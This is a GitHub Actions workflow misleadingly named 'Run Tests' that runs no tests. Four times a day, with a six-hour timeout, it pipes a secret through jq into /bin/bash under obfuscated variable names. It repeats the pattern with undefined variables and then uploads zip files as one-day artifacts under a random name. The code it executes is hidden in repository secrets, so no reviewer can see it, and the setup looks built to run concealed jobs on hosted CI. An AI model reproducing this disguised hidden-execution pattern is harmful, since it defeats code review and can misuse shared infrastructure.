name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '43 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          zoq6205: ${{ secrets.zoq6205 }}
        run: |
          printf '%s' "$zoq6205" | jq -r .ycry706 | /bin/bash
          printf '%s' "$xmgix48396" | jq -r .oyv532 | /bin/bash
          echo $zgro5 | jq -r .vzlhb97621 | /bin/bash
          echo $vghva65 | jq -r .y20 | /bin/bash
          echo $w12 | jq -r .iklyn26438 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: gBDvxwS6
          path: "*.zip"
          retention-days: 1
